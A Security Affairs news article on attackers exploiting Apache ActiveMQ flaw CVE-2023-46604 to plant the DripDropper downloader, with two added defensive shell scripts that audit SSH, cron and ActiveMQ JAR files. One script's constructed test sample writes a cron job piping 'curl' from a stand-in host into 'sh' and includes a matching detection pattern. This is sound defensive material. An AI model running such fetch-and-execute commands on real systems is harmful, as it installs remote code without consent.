Hackers deploy DripDropper via Apache ActiveMQ flaw, patch systems to evade detection – Security Affairs

Hackers exploit Apache ActiveMQ flaw to install DripDropper on Linux, then patch it to block rivals and hide their tracks.

Red Canary researchers observed attackers exploiting a two-year-old Apache ActiveMQ vulnerability, tracked as CVE-2023-46604 (CVSS score 10.0), to gain persistence on cloud-hosted Linux systems and deploy the DripDropper malware. Notably, once inside, the attackers patched the flaw themselves, both to lock out rival intruders and to evade detection.

“It may seem counterintuitive for an adversary to ‘fix’ a compromised system after gaining remote access, but in many scenarios the motivation can be twofold,” reads the report published by Red Canary. “It’s a great way to potentially lock out other adversaries, ensuring their foothold remains exclusive. It can also obscure the adversary’s initial access technique.”

Apache ActiveMQ is an open-source message broker that serves as message-oriented middleware (MOM). Developed by the Apache Software Foundation and written in Java, it provides messaging capabilities that let applications exchange data and communicate asynchronously.

Once they had compromised a target system, the attackers used tools such as Sliver and Cloudflare Tunnels to maintain long-term access. In one case, they altered the SSH daemon configuration to allow root logins, giving them full control. They then deployed a new malware downloader, dubbed DripDropper, as a further layer of persistence. The same flaw has previously been abused to spread ransomware and cryptominers.

DripDropper is a stealthy Linux downloader packaged as an encrypted PyInstaller ELF binary that requires a password to run, which hampers analysis. It connects to a Dropbox account using a hardcoded token and drops two malicious files. The first varies in behaviour, for example monitoring processes or fetching further commands, and persists by modifying cron jobs. The second, which carries a random name, also contacts Dropbox and often tampers with the SSH configuration, enabling persistent access through low-profile system accounts such as games. Exactly what data is exchanged with Dropbox remains unknown.
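The SSH and cron changes described in the two paragraphs above are what a responder would check first on a suspect host. The audit script below is an added example, not code from the Red Canary report or from this article. All paths are parameters so it can be run against a live host or a mounted image, the cron pattern is a heuristic of my own rather than an indicator from the report, and the sample files it builds are constructed (nothing in them is a real artefact).

```shell
#!/bin/sh
# Added example: post-compromise audit for the SSH and cron changes described above.
# Not taken from the Red Canary report. Each check prints exactly one line that
# starts with FINDING or OK and always returns 0, so it composes under set -e.

# Effective PermitRootLogin. sshd honours the first occurrence of a directive, and
# directives after a Match line apply only to that block, so we stop at Match.
check_root_login() {
    _val=$(awk 'tolower($1)=="match" {exit}
                tolower($1)=="permitrootlogin" {print tolower($2); exit}' "$1" 2>/dev/null || true)
    [ -n "$_val" ] || _val="prohibit-password"   # OpenSSH default when the directive is absent
    if [ "$_val" = "yes" ]; then
        echo "FINDING sshd PermitRootLogin=$_val (root password logins allowed)"
    else
        echo "OK sshd PermitRootLogin=$_val"
    fi
}

# A system account such as "games" should have a nologin shell and no SSH keys.
# Args: passwd file, account name, filesystem root prefix ("" for the live host).
check_system_account() {
    _passwd="$1"; _acct="$2"; _root="$3"
    _entry=$(awk -F: -v a="$_acct" '$1==a {print $6 ":" $7; exit}' "$_passwd" 2>/dev/null || true)
    if [ -z "$_entry" ]; then
        echo "OK account $_acct not present"
        return 0
    fi
    _home=${_entry%:*}
    _shell=${_entry##*:}
    _keys="$_root$_home/.ssh/authorized_keys"
    _nkeys=0
    if [ -f "$_keys" ]; then
        _nkeys=$(grep -cE '^[[:space:]]*(ssh-|ecdsa-|sk-)' "$_keys" || true)
    fi
    case "$_shell" in
        */nologin|*/false|"") _shell_ok=1 ;;
        *) _shell_ok=0 ;;
    esac
    if [ "$_shell_ok" = 0 ] || [ "$_nkeys" -gt 0 ]; then
        echo "FINDING account $_acct shell=$_shell authorized_keys=$_nkeys"
    else
        echo "OK account $_acct shell=$_shell authorized_keys=$_nkeys"
    fi
}

# Cron heuristic (my own pattern): entries that pipe curl/wget output into a shell,
# or that run anything out of world-writable scratch directories.
# Accepts any number of crontab files or cron directories.
check_cron() {
    _hits=0
    if [ $# -gt 0 ]; then
        _hits=$(grep -rEh '(curl|wget)[^|]*\|[[:space:]]*(ba|da)?sh|(/tmp|/dev/shm|/var/tmp)/' "$@" 2>/dev/null \
                | awk 'END {print NR}')
    fi
    if [ "$_hits" -gt 0 ]; then
        echo "FINDING cron suspicious_entries=$_hits"
    else
        echo "OK cron suspicious_entries=0"
    fi
}

# Constructed sample host (not real artefacts): root login enabled, the games
# account given a shell and an SSH key, and a cron job fetching a remote script.
build_sample() {
    _d=$(mktemp -d)
    printf '%s\n' '#PermitRootLogin prohibit-password' 'PermitRootLogin yes' \
                  'Match User backup' '    PermitRootLogin no' > "$_d/sshd_config"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
                  'games:x:5:60:games:/usr/games:/bin/bash' > "$_d/passwd"
    mkdir -p "$_d/usr/games/.ssh" "$_d/cron.d"
    echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedNotARealKey attacker@example' \
        > "$_d/usr/games/.ssh/authorized_keys"
    echo '*/5 * * * * root curl -s http://203.0.113.10/x | sh' > "$_d/cron.d/update"
    echo "$_d"
}

sample=$(build_sample)
check_root_login "$sample/sshd_config"
check_system_account "$sample/passwd" games "$sample"
check_cron "$sample/cron.d"
rm -rf "$sample"
# On a live host:  check_root_login /etc/ssh/sshd_config
#                  check_system_account /etc/passwd games ""
#                  check_cron /etc/crontab /etc/cron.d /var/spool/cron
```

Run as-is it audits the constructed sample and reports all three findings; point the functions at /etc/ssh/sshd_config, /etc/passwd and the cron locations (or the same paths under a mounted image root) to audit a real system. The checks are deliberately narrow: they catch the specific changes the report describes, not every way a Linux host can be backdoored.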

“Finally, the adversary used curl to download two ActiveMQ JAR files from repo1[.]maven[.]org, a domain belonging to Apache Maven. These two JAR files constitute a legitimate patch for CVE-2023-46604. By deleting the existing JAR files and replacing them, the adversary effectively patched the already compromised system,” continues the report. “We assess the adversary likely did this to reduce detection via common methods, such as vulnerability scanners, and to effectively reduce the likelihood of being spotted by defenders due to another adversary being detected when attempting to exploit the vulnerability.”

Threat actors have used this technique while exploiting other CVEs as well. The researchers point out that patching the vulnerability does not disrupt the intruders' operations, because by then they have already established other persistence mechanisms.
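A vulnerability scanner keyed on the ActiveMQ version will indeed report a system patched this way as clean, so the useful check is for how the patch got there. The script below is an added example, not code from the Red Canary report or from this article. It flags a lib directory whose activemq-*.jar files carry mixed versions, and JARs that are newer than a reference file from the original install. The sample it builds is constructed: the component names are real ActiveMQ modules, but which two JARs are swapped and the 5.18.2/5.18.3 version pair are my assumptions for illustration (5.18.3 is the fixed 5.18.x release for CVE-2023-46604), and the /opt/activemq paths in the comments are a typical tarball layout, not something the report states.

```shell
#!/bin/sh
# Added example (not from the Red Canary report): detect an ActiveMQ install that
# was "patched" by swapping individual JARs rather than by a proper upgrade.
# Point the checks at the broker's lib directory.

# Lists "<component> <version>" for every activemq-*.jar directly in the directory,
# parsing the Maven-style file name activemq-<component>-<version>.jar.
list_activemq_jars() {
    for _f in "$1"/activemq-*.jar; do
        [ -e "$_f" ] || continue
        _b=${_f##*/}; _b=${_b%.jar}
        echo "${_b%-*} ${_b##*-}"
    done
}

# A genuine release ships every activemq-*.jar at one version. Any JAR whose
# version differs from the majority is reported, which is exactly the residue a
# targeted replacement of a couple of files leaves behind.
check_jar_versions() {
    list_activemq_jars "$1" | sort | awk '
        { comp[NR] = $1; ver[NR] = $2; n[$2]++ }
        END {
            if (NR == 0) { print "OK no activemq-*.jar files in directory"; exit }
            best = ""
            for (v in n)
                if (best == "" || n[v] > n[best] || (n[v] == n[best] && v < best)) best = v
            out = ""; sep = ""
            for (i = 1; i <= NR; i++)
                if (ver[i] != best) { out = out sep comp[i] "=" ver[i]; sep = "," }
            if (out == "") print "OK version=" best " jars=" NR
            else print "FINDING majority=" best " jars=" NR " outliers=" out
        }'
}

# JARs modified after a reference file laid down by the original install (the
# bin/activemq launcher is a convenient choice on a live host). Files dropped in
# by hand are newer than everything else; a real upgrade replaces the whole tree.
check_jar_mtimes() {
    _newer=$(find "$1" -name 'activemq-*.jar' -newer "$2" 2>/dev/null \
             | sed 's#.*/##' | sort | tr '\n' ',' | sed 's/,$//')
    if [ -n "$_newer" ]; then
        echo "FINDING newer_than_ref=$_newer"
    else
        echo "OK no activemq-*.jar newer than reference"
    fi
}

# Constructed sample lib directory: empty files stand in for JARs. A 5.18.2 install
# in which only activemq-client and activemq-openwire-legacy were later replaced by
# 5.18.3 copies (the swapped pair and the dates are assumptions for illustration).
build_sample_lib() {
    _d=$(mktemp -d)
    for _c in broker client openwire-legacy kahadb-store spring jms-pool; do
        : > "$_d/activemq-${_c}-5.18.2.jar"
    done
    : > "$_d/activemq"                          # stand-in for the bin/activemq launcher
    touch -t 202309010000 "$_d"/*               # everything dated at install time
    rm "$_d/activemq-client-5.18.2.jar" "$_d/activemq-openwire-legacy-5.18.2.jar"
    : > "$_d/activemq-client-5.18.3.jar"
    : > "$_d/activemq-openwire-legacy-5.18.3.jar"
    touch -t 202508200000 "$_d"/*-5.18.3.jar    # the hand-dropped replacements
    echo "$_d"
}

lib=$(build_sample_lib)
check_jar_versions "$lib"
check_jar_mtimes "$lib" "$lib/activemq"
rm -rf "$lib"
# On a live host (typical tarball layout, adjust to yours):
#   check_jar_versions /opt/activemq/lib
#   check_jar_mtimes   /opt/activemq/lib /opt/activemq/bin/activemq
```

Both findings should be read together: mixed versions alone can come from a sloppy but legitimate hotfix, and newer mtimes alone from a routine upgrade, but two JARs at a fixed version dated long after the rest of a still-vulnerable release is the pattern the report describes. If ActiveMQ was installed from a distribution package, the package manager's verify mode (rpm -V, dpkg --verify) does the same comparison against recorded file hashes.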

Red Canary notes that attackers continue to exploit the same ActiveMQ flaw to deploy the Godzilla web shell and RansomHub ransomware, and that the vulnerability carries an EPSS score of 94%, a very high estimated probability of in-the-wild exploitation.

“Securing cloud and *NIX-based environments demands a multi-layered approach,” concludes the report.

In January 2024, Trustwave researchers observed a surge in attacks exploiting the same flaw, in many cases to deliver malicious code that borrows from the open-source Godzilla web shell.

The threat actors concealed the web shell inside an unknown binary format, evading signature-based scanners. Once deployed, ActiveMQ's JSP engine compiles and executes the web shell.

In November 2023, researchers at Rapid7 reported suspected exploitation of the then newly disclosed critical vulnerability CVE-2023-46604 in Apache ActiveMQ.

Rapid7 identified exploitation attempts of the CVE-2023-46604 flaw to deploy HelloKitty ransomware in two different customer environments.

Pierluigi Paganini

(SecurityAffairs – hacking, Apache ActiveMQ)